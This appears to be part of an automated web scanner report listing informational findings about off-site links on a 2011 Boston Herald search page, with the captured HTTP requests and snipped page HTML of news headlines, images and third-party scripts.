Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search/?topic=Boston&searchSite=recent&srvc=home HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:06:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DBoston%26searchSite%3Drecent%26srvc%3Dhome&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</a>&nbsp;&nbsp;
+ <a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/scores/live/scoreboard.aspx?date=">Boston Celtics Schedule</a>&nbsp;&nbsp;
+ <a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Boston Bruins Schedule</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/regional/view.bg?articleid=1312542&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1312571&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312694&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312654&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531">
...[SNIP]...
</a>&nbsp;&nbsp;
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif" alt="Poll" style="margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1312569&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/real_estate/view.bg?articleid=1312639&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1312540&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/editorials/view.bg?articleid=1312510&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/sports/basketball/other_nba/view.bg?articleid=1312671">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/889a86_ltpBlatum012811.jpg" title="The Celtics&rsquo; Rajon Rondo (9) drives around the Trail Blazers&rsquo; Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore." alt="The Celtics&rsquo; Rajon Rondo (9) drives around the Trail Blazers&rsquo; Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore.">
</a>
...[SNIP]...
id=1312671" title="Blazers F Nicolas Batum has clear MRI on left knee"
onclick="switchPhoto('198224');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198224" src="http://multimedia.heraldinteractive.com/images/20110128/stp/889a86_ltpBlatum012811.jpg" title="The Celtics&rsquo; Rajon Rondo (9) drives around the Trail Blazers&rsquo; Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
654" title="Mitt Romney &lsquo;catches up&rsquo; with Boston GOP pols"
onclick="switchPhoto('198222');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198222" src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" title="Mitt Romney is seen in this April 23, 2009 file photo in Boston."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
bg?articleid=1312577" title="Shaquille O&rsquo;Neal earns fresh shot"
onclick="switchPhoto('198165');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198165" src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" title="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
lege/basketball/view.bg?articleid=1312562" title="Duke shoots down BC"
onclick="switchPhoto('198115');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198115" src="http://multimedia.heraldinteractive.com/images/20110128/stp/b95680_Sing_01282011.jpg" title="CAN&#x2019;T GET A GRIP: Duke&#x2019;s Kyle Singler (left) reaches for a rebound against Boston College&#x2019;s Reggie Jackson during the first half of last night&#x2019;s BC defeat in Durham, N.C."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
e="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..."
onclick="switchPhoto('198099');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198099" src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" title="Mitt Romney."
alt="Angela Rowlings" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312552" title="Another winter wallop batters Boston"
onclick="switchPhoto('198098');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198098" src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" title="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1312550" title="Moore&rsquo;s the merrier at Hasty festivities"
onclick="switchPhoto('198088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
leid=1312545" title="Disabled resident tells city: Tap kids to shovel"
onclick="switchPhoto('198097');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198097" src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" title="STUCK: Terri Farrell tries to navigate in her scooter along L Street in South Boston. She says she&#x2019;s been forced to stay home because of all the snow."
alt="Angela Rowlings" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1312542" title="Crane elevator malfunction keeps worker hanging"
onclick="switchPhoto('198092');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198092" src="http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg" title="TRAPPED: Boston firefighters rescue a stranded crane operator from a stuck elevator at the Conley Terminal in South Boston."
alt="Stuart Cahill" style="margin:0 2px" />

</a>
...[SNIP]...
gional/view.bg?articleid=1312541" title="Feds: Fake cop scammed dates"
onclick="switchPhoto('198103');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198103" src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" title="Eric Williams allegedly posed as a federal marshal."
alt="Staff graphic" style="margin:0 2px" />

</a>
...[SNIP]...
ness/general/view.bg?articleid=1312531" title="Wal-Mart seeks opening"
onclick="switchPhoto('198121');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198121" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" title=""
alt="File" style="margin:0 2px" />

</a>
...[SNIP]...
w.bg?articleid=1312530" title="Mexican lovers: It&rsquo;s fiesta time"
onclick="switchPhoto('198095');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198095" src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" title="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace."
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
w.bg?articleid=1312527" title="Anthony Castonzo follows lead blockers"
onclick="switchPhoto('198112');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198112" src="http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg" title="
EAGLE-EYE PROTECTION: Former Boston College offensive lineman Anthony Castonzo has put his physical blocking style on display for NFL scouts at the Senior Bowl."
alt="John Wilcox" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198210');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198210" src="http://multimedia.heraldinteractive.com/images/20110128/stp/09191d_ltpChromeo012711.jpg" title="Chromeo"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198208');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198208" src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" title="Bad Rabbits"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198207');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198207" src="http://multimedia.heraldinteractive.com/images/20110128/stp/afacc0_ltpOMD012711.jpg" title="Orchestral Manoeuvres in the Dark"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198206');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198206" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8a420e_ltpSteamB012811.jpg" title="Reporter Josh Walovitch, right, chats with Marin McNulty before getting exfoliated."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198205');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198205" src="http://multimedia.heraldinteractive.com/images/20110128/stp/c1e423_ltpSteam012811.jpg" title="BACK UP: Reporter Josh Walovitch gets exfoliated with <i>venik,</i> a bundle of birch and twigs."
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198204');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198204" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2597e5_ltpBikramA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198105');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198105" src="http://multimedia.heraldinteractive.com/images/20110128/stp/164330_Hot_01282011.jpg" title="FUELING FLAMES: Maura Tucker and Mark Dunn enjoy cocoa and cookies by the fireplace at UpStairs on the Square in Cambridge this week."
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198197');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198197" src="http://multimedia.heraldinteractive.com/images/20110128/stp/288822_ltpManicure012811.jpg" title="DIGITAL AGE: Your hands will be in tip-top shape after a hot cream manicure at Bliss Spa at the W Hotel."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198196');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198196" src="http://multimedia.heraldinteractive.com/images/20110128/stp/6819c5_ltpYogaA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching."
alt="Herald file" style="margin:0 2px" />

</a>
...[SNIP]...
?articleid=1312509" title="Cops arrest Shawn Drumgold on drug charges"
onclick="switchPhoto('198091');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198091" src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" title="Shawn Drumgold"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
sketball/view.bg?articleid=1312503" title="Seminoles wear down Eagles"
onclick="switchPhoto('198114');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198114" src="http://multimedia.heraldinteractive.com/images/20110128/stp/550ed9_BC_01282011.jpg" title="CAN&#x2019;T TAKE IT AWAY: Boston College&#x2019;s Kristen Doherty (left) and Carolyn Swords surround Florida State&#x2019;s Chasity Clayton during the Eagles&#x2019; 102-93 loss last night."
    <img id="197592" src="http://multimedia.heraldinteractive.com/images/20110125/stp/4ea241_music_01252011.jpg" title="Nikki Yanofsky."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
ment/arts_culture/view.bg?articleid=1311759" title="Naughty by nature"
onclick="switchPhoto('197582');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197582" src="http://multimedia.heraldinteractive.com/images/20110125/stp/052e14_glover_01252011.jpg" title="GETTING SCHOOLED:
Comedian Danny Glover,above , stars on &#x2018;Community&#x2019;."
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311752" title="Drill, baby, drill!"
onclick="switchPhoto('197568');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197568" src="http://multimedia.heraldinteractive.com/images/20110124/stp/9d98c9_drill_01252011.jpg" title="NOTHING TO SEE: Police officers chat with officials from Beth Israel Deaconess Medical Center yesterday about a drill."
alt="Matthew West" style="margin:0 2px" />

</a>
...[SNIP]...
?articleid=1311748" title="Prosecutors: Driver drunk in I-93 rollover"
onclick="switchPhoto('197565');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197565" src="http://multimedia.heraldinteractive.com/images/20110124/stp/08bb48_court_01252011.jpg" title="&#x2018;GRIEVOUS&#x2019;: Patrick Fay, 24, of Holbrook appears in
Dorchester District Court yesterday on charges of drunken driving and fleeing the scene of a crash."
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
l/view.bg?articleid=1311738" title="Elderly bicyclist killed in crash"
onclick="switchPhoto('197570');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197570" src="http://multimedia.heraldinteractive.com/images/20110124/stp/f00c74_bike_01252011.jpg" title="Boston Police investigate a fatal bicyclist accident on Herald Street, near the corners of Tremont and Arlington."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
311725" title="Celtics C Shaquille O&rsquo;Neal ruled out for Tuesday"
onclick="switchPhoto('197561');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197561" src="http://multimedia.heraldinteractive.com/images/20110124/stp/470a99_shaq_01242011.jpg" title="Shaquille O&rsquo;Neal."
alt="Christopher Evans" style="margin:0 2px" />

</a>
...[SNIP]...
id=1311629" title="MBTA bus driver pleads not guilty to driving drunk"
onclick="switchPhoto('197505');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197505" src="http://multimedia.heraldinteractive.com/images/20110124/stp/7a4442_f21bb4_Mccarthy_01232011.jpg" title="John McCarthy "
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
" title="Treasurer Steve Grossman confirms Tim Cahill campaign probe"
onclick="switchPhoto('197488');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197488" src="http://multimedia.heraldinteractive.com/images/20110124/stp/fc0641_031610cahillmg01.jpg" title="Tim Cahill"
alt="Mark Garfinkel (file)" style="margin:0 2px" />

</a>
...[SNIP]...
rticleid=1311595" title="City bicyclist fatally struck during commute"
onclick="switchPhoto('197503');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197503" src="http://multimedia.heraldinteractive.com/images/20110124/stp/f6fd9b_ltpBikesceneA012411.jpg" title="Boston Police investigate a fatal bicyclist accident on Herald Street, near the corners of Tremont and Arlington streets this morning."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
l/view.bg?articleid=1311585" title="Sub-zero temps wreak havoc with T"
onclick="switchPhoto('197481');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197481" src="http://multimedia.heraldinteractive.com/images/20110124/stp/439ffc_ltpColdpeopleA012411.jpg" title="Pedestrians walk towards Federal Street in the bitter cold this morning."
alt="Matt Stone" style="margin:0 2px" />

</a>
...[SNIP]...
.bg?articleid=1311581" title="Dustin Pedroia hangs with the big dawgs"
onclick="switchPhoto('197478');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197478" src="http://multimedia.heraldinteractive.com/images/20110124/stp/c9d99f_pedroia012411.jpg" title="Dustin Pedroia continues his sponsorship deal as Sullivan Tire spokesperson. He filmed a commercial Wednesday with &lsquo;Misty.&rsquo;"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311555" title="Patriots fan Amy Poehler lives in a house divided"
onclick="switchPhoto('197465');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197465" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a0920e_amy_01242011.jpg" title="Amy Poehler."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
itle="We Hear: Josh Beckett, Lamar Odom, Khloe Kardashian and more..."
onclick="switchPhoto('197447');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197447" src="http://multimedia.heraldinteractive.com/images/20110123/stp/ccc6fe_josh_01242011.jpg" title="Josh Beckett."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
"Tracked Down: Maria Menounos, John Henry, Martha Coakley and more..."
onclick="switchPhoto('197446');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197446" src="http://multimedia.heraldinteractive.com/images/20110123/stp/d5e151_henry_01242011.jpg" title="John Henry and his wife, Linda, left, and Big Brothers Big Sisters
CEO Wendy Foster attend the agency&#x2019;s Big 12 Gala."
alt="John Kreis" style="margin:0 2px" />

</a>
...[SNIP]...
general/view.bg?articleid=1311545" title="&lsquo;Being&rsquo; himself"
onclick="switchPhoto('197452');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197452" src="http://multimedia.heraldinteractive.com/images/20110123/stp/82de90_vamp_01242011.jpg" title="BLOODY GOOD SHOW: Sam Witwer says there&#x2019;s a lot of
potential in the American remake of BBC&#x2019;s &#x2018;Being Human.&#x2019;"
alt="" style="margin:0 2px" />

</a>
...[SNIP]...
iew.bg?articleid=1311531" title="BC&rsquo;s Corey Raji sitting pretty"
onclick="switchPhoto('197462');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197462" src="http://multimedia.heraldinteractive.com/images/20110124/stp/8ba7b4_raji_01242011.jpg" title="
FORWARD MARCH: Boston College senior Corey Raji is averaging career highs in points and rebounds despite losing his starting job earlier in the season."
alt="Matthew Healey" style="margin:0 2px" />

</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311518" title="Cold, hard truth..."
onclick="switchPhoto('197443');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197443" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7de6bf_walk_01242011.jpg" title="BONE-CHILLING: Bundled-up walkers make&#x2028;their way along the beach off Day Boulevard &#x2028;in South Boston yesterday.
"
alt="Matthew Healey" style="margin:0 2px" />

</a>
...[SNIP]...
view.bg?articleid=1311514" title="Big hit sends Savard home for tests"
onclick="switchPhoto('197460');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197460" src="http://multimedia.heraldinteractive.com/images/20110124/stp/2dc50c_sav_01242011.jpg" title="Marc Savard."
alt="Stuart Cahill" style="margin:0 2px" />

</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.298. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search/?topic=Rep.+James+Vallee&searchSite=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
